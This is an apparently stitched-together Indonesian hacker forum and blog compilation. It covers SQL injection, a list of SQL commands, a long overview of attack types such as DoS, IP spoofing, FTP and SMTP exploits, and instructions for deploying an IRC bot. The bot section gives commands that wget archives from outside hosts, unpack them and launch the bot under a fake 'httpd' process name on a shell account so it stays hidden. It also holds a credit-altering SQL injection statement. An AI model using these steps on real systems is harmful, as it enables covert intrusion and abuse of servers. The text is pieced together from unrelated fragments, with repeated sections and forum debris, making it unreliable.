Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com

Sumber : http://www.jambihackerlink.tk/


SQL Commands Yang Umum Digunakan

Berikut adalah beberapa SQL Commands yang umum, disini saya tidak akan memandu anda bagaimana cara penggunaan dari Command tersebut...jadi jangan pernah bertanya kepada saya bagaimana command tersebut digunakan.......sikap bijaksana yang harus anda ambil adalah dengan bertanya kepada paman google....karena dengannya akan terkuak jawaban dari pertanyaan anda..........

Berikut ini Commandnya:

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
NB: BOT Ini akan otomatis jalan pada server dalnet ” Husus Untuk dalnet server “

1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz

atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <–untuk tambahan creat.tcl

2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz

tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2

3. cd .kin

4. ./creat fileconf nick ident IP channel owner

contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek

defaced……………….. file conf yg akan dibuat (akan terbuat dgn sendirinya)

s4nd4l_j3p1t ……………nick bot

s4nd4l ……………….ident bot

212.88.174.3 …….IP shell
defaced ………………… nama channel, jangan pake #

g4ptek ……………. nick owner



catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)

contoh: mich`keren -> mich\`keren

5. ./eggdrop -m fileconf

atau ./run fileconf fakename

fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat

contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)

Udah deh! tunggu aja di channel, ato whois aja nicknya.

Bila ingin tambahkan tcl lain seperti creat.tcl :


2. ./tcl -t fileconf creat.tcl

contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )

untuk penggunaan bisa diliat dengan command/perintah !creat dichannel


Cara Mudah Untuk membuat BOT II

wget http://geocities.com/g4ptek/tools/bot.tar.gz

tar -zxvf bot.tar.gz

rm -rf bot.tar.gz

cd .share

# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi

# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt

# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/

# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi

./shade “httpd” ./eggdrop -m bot.txt

# usage:

# pv bot kamu di channel

# /msg nick-bot-kamu auth

# /msg nick-bot-kamu pass

# /msg nick-bot-kamu auth


Selamat BikiN Bot….
Kamis, 27 September 2007

cara dan jenis hacker menyerang situs..

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap
server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6
kelas, yaitu:

Intrusion
Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat
menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk
menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).
Hacking is an Art!? =)

Denial of Services (DoS)
Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran
request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting
request pada server secara serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe....)

Joyrider
Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa
belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe
menyebabkan kerusakan atau kehilangan data.

Vandal
Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)

Scorekeeper
Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya
berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan
kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.

Spy
Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin
target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya

______________________

ntar yang laen tambah nech Laughing
_________________
I'm nothing
QUICK EDIT YOUR POST
LaST



Sersan Kepala
Sersan Kepala

Posts: 321

Reputation: 11

Joined: 11 Apr 2007
Location: behind your system


LaST is offline
View user's profile Send private message Send e-mail Visit poster's website Yahoo Messenger

Back to top
PostPosted: Tue Jul 31, 2007 12:12 am Post subject: Reply with quote
QUICK EDIT YOUR POST

Attach signature (signatures can be changed in profile) close
1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.
Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception
TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt. Smile Beer
15 Jenis Serangan Cracker

Seringkali ketika kita menemukan kerawanan ataupun missconfiguration pada system sendiri, kita akan menganggap hal itu adalah hal yang kecil, karena kita menanggapinya bukan sebagai lubang keamanan. Tools maupun teknik yang digunakan cracker kebanyakan adalah variasi dari serangan yang mereka lakukan sebelumnya. Sebagai Administrator baik system maupun jaringan ataupun end user, Anda haruslah banyak belajar dari pengalaman penyerangan yang terjadi sebelumnya (walaupun serangan tersebut terjadi pada orang lain) untuk menghindari serangan yang akan terjadi berikutnya.

Mengetahui jenis serangan sangat penting untuk menjaga stabilitas system, sehingga anda tidak perlu repot untuk menginstall system baru agar lebih aman, anda hanya perlu mempatch atau bahkan sedikit mengkonfigurasi system anda Mungkin bagi beberapa orang tulisan ini merupakan tulisan yang sangat mendasar, tapi tidak ada salahnya jika anda sebagai seorang Profesional untuk mereview sesuatu yang dasar dari waktu ke waktu.. Artikel ini bukan ditujukan untuk menyerang tetapi sebaliknya yaitu untuk bertahan, karena menurut hemat saya untuk bertahan anda harus tahu cara menyerang. Dalam artikel ini terdapat serangan yang sering dilakukan oleh cracker dan disetiap serangan mempunyai metode-metode tersendiri, contohnya saja dalam melakukan IP spoofing yang mempunyai banyak metode diantaranya man in the middle attack. Dengan alasan diatas saya akan mencoba menggaris besarkan seranganserangan umum yang sering dilakukan cracker dan harus diketahui oleh seorang Administrator maupun end user, sedangkan metode-metode yang lebih spesifik mungkin akan saya tuangkan dalam tulisan saya berikutnya baik itu penyerangan ataupun metode yang dilakukan untuk bertahan. Saya tahu tulisan berikut adalah jauh dari sempurna, untuk itu saran dan kritik sangat saya harapkan.

IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker Protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP)
dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.

Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikandan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan.

Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.

FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service.

Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bias membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow.

Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam system.

Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bias menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.

Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.


TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini.

Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).

Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali. Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content – based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk perusakan dan pembobolan.

Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters) yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara ini.

E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan mengexploitasi fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.

Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.

Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol perute-an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga sering terjadi pada POP dan IMAP.

